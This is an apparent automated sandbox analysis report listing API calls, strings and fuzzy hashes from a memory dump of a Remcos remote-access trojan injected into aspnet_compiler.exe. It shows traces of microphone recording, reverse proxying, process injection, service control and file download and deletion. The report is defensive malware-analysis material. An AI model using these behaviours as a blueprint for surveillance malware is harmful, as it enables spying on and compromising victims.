                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                          • String ID:
                                                                          • API String ID: 2441525078-0
                                                                          • Opcode ID: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                                          • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                          • Opcode Fuzzy Hash: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                                          • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                          APIs
                                                                          • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                          • TranslateMessage.USER32(?), ref: 00404F30
                                                                          • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                          • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                                                          • API String ID: 2956720200-749203953
                                                                          • Opcode ID: 0622db17b8ffedd3531a9fa1e5e3f576bb625bfe4daf1fd40acc4f0bc4360242
                                                                          • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                          • Opcode Fuzzy Hash: 0622db17b8ffedd3531a9fa1e5e3f576bb625bfe4daf1fd40acc4f0bc4360242
                                                                          • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                          • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                          • String ID: <$@$@FG$@FG$Temp
                                                                          • API String ID: 1107811701-2245803885
                                                                          • Opcode ID: 248dd396e914dd493217af7d7ad54a5765675a85d7a0f101f9c1831ea090813b
                                                                          • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                          • Opcode Fuzzy Hash: 248dd396e914dd493217af7d7ad54a5765675a85d7a0f101f9c1831ea090813b
                                                                          • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                          • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe), ref: 00406705
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CurrentProcess
                                                                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                          • API String ID: 2050909247-4145329354
                                                                          • Opcode ID: ae628e6cf13d6acf56a74fe03314e9eaaf54e5537fc186528355c397fff7ef9b
                                                                          • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                          • Opcode Fuzzy Hash: ae628e6cf13d6acf56a74fe03314e9eaaf54e5537fc186528355c397fff7ef9b
                                                                          • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                          APIs
                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                          • String ID:
                                                                          • API String ID: 221034970-0
                                                                          • Opcode ID: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                                          • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                          • Opcode Fuzzy Hash: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                                          • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                          APIs
                                                                          • _free.LIBCMT ref: 00446DDF
                                                                            • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                            • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                          • _free.LIBCMT ref: 00446DEB
                                                                          • _free.LIBCMT ref: 00446DF6
                                                                          • _free.LIBCMT ref: 00446E01
                                                                          • _free.LIBCMT ref: 00446E0C
                                                                          • _free.LIBCMT ref: 00446E17
                                                                          • _free.LIBCMT ref: 00446E22
                                                                          • _free.LIBCMT ref: 00446E2D
                                                                          • _free.LIBCMT ref: 00446E38
                                                                          • _free.LIBCMT ref: 00446E46
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 776569668-0
                                                                          • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                          • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                          • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                          • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Eventinet_ntoa
                                                                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                          • API String ID: 3578746661-4192532303
                                                                          • Opcode ID: a0049f2f09a357c7da3f2da1302c44ceee5b7892c88a4f25036bd0ddf1a9f3a7
                                                                          • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                          • Opcode Fuzzy Hash: a0049f2f09a357c7da3f2da1302c44ceee5b7892c88a4f25036bd0ddf1a9f3a7
                                                                          • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                          APIs
                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DecodePointer
                                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                          • API String ID: 3527080286-3064271455
                                                                          • Opcode ID: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
                                                                          • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                          • Opcode Fuzzy Hash: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
                                                                          • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                          APIs
                                                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                            • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                                          • Sleep.KERNEL32(00000064), ref: 00416688
                                                                          • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CreateDeleteExecuteShellSleep
                                                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                          • API String ID: 1462127192-2001430897
                                                                          • Opcode ID: 826bb05371ff64d740857fa337f72034cbc796444b6efc95c58373138809deed
                                                                          • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                          • Opcode Fuzzy Hash: 826bb05371ff64d740857fa337f72034cbc796444b6efc95c58373138809deed
                                                                          • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                          APIs
                                                                          • _strftime.LIBCMT ref: 00401AD3
                                                                            • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                          • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                          • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                          • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                          • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                          • API String ID: 3809562944-3643129801
                                                                          • Opcode ID: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                                          • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                          • Opcode Fuzzy Hash: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                                          • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                          APIs
                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                          • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                          • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                          • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                          • waveInStart.WINMM ref: 00401A81
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                          • String ID: XCG$`=G$x=G
                                                                          • API String ID: 1356121797-903574159
                                                                          • Opcode ID: 4fec801bf293db6df151fde61eeb5f786b1727cfb1468d64e42c9e242be372bd
                                                                          • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                          • Opcode Fuzzy Hash: 4fec801bf293db6df151fde61eeb5f786b1727cfb1468d64e42c9e242be372bd
                                                                          • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                          APIs
                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                            • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                            • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                            • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                          • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                          • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                          • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                          • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                          • String ID: Remcos
                                                                          • API String ID: 1970332568-165870891
                                                                          • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                          • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                          • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                          • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                                          • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                          • Opcode Fuzzy Hash: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                                          • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                          APIs
                                                                          • GetCPInfo.KERNEL32(?,?), ref: 00452BD6
                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452C59
                                                                          • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452CEC
                                                                          • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452D03
                                                                            • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452D7F
                                                                          • __freea.LIBCMT ref: 00452DAA
                                                                          • __freea.LIBCMT ref: 00452DB6
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                          • String ID:
                                                                          • API String ID: 201697637-0
                                                                          • Opcode ID: 5a84a6a5317ae172974df595155495cbc46435c9615446bda379f5f3d343e1a3
                                                                          • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                          • Opcode Fuzzy Hash: 5a84a6a5317ae172974df595155495cbc46435c9615446bda379f5f3d343e1a3
                                                                          • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                          APIs
                                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                          • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                          • _free.LIBCMT ref: 00444714
                                                                          • _free.LIBCMT ref: 0044472D
                                                                          • _free.LIBCMT ref: 0044475F
                                                                          • _free.LIBCMT ref: 00444768
                                                                          • _free.LIBCMT ref: 00444774
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _free$ErrorLast$_abort_memcmp
                                                                          • String ID: C
                                                                          • API String ID: 1679612858-1037565863
                                                                          • Opcode ID: 4045a2e03b7b0fda526f0a9e820ad73f36c10bcbe96ad2bd9ebfcc8c6ddf23ea
                                                                          • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                          • Opcode Fuzzy Hash: 4045a2e03b7b0fda526f0a9e820ad73f36c10bcbe96ad2bd9ebfcc8c6ddf23ea
                                                                          • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: tcp$udp
                                                                          • API String ID: 0-3725065008
                                                                          • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                          • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                          • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                          • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _free
                                                                          • String ID: gKE$HE$HE
                                                                          • API String ID: 269201875-2777690135
                                                                          • Opcode ID: 7800a519142f47635a8271b71284b9659b79823d2b8030c83ffac0f9e2146641
                                                                          • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                          • Opcode Fuzzy Hash: 7800a519142f47635a8271b71284b9659b79823d2b8030c83ffac0f9e2146641
                                                                          • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                          APIs
                                                                          • ExitThread.KERNEL32 ref: 004017F4
                                                                            • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                                            • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                                          • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                            • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                          • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                            • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                                            • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                          • String ID: T=G$p[G$>G$>G
                                                                          • API String ID: 1596592924-2461731529
                                                                          • Opcode ID: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                                          • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                          • Opcode Fuzzy Hash: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                                          • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                          • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                            • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                            • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                          • String ID: .part
                                                                          • API String ID: 1303771098-3499674018
                                                                          • Opcode ID: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                                          • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                          • Opcode Fuzzy Hash: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                                          • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                          APIs
                                                                            • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                            • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                            • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                            • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                          • _wcslen.LIBCMT ref: 0041A8F6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                          • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                          • API String ID: 37874593-703403762
                                                                          • Opcode ID: 8d7f7000506fb44ae307e9e559f48fe1fd4854344d8ef950826ae216f426f9bc
                                                                          • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                                          • Opcode Fuzzy Hash: 8d7f7000506fb44ae307e9e559f48fe1fd4854344d8ef950826ae216f426f9bc
                                                                          • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 004499AA
                                                                          • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 00449A30
                                                                          • __alloca_probe_16.LIBCMT ref: 00449AC7
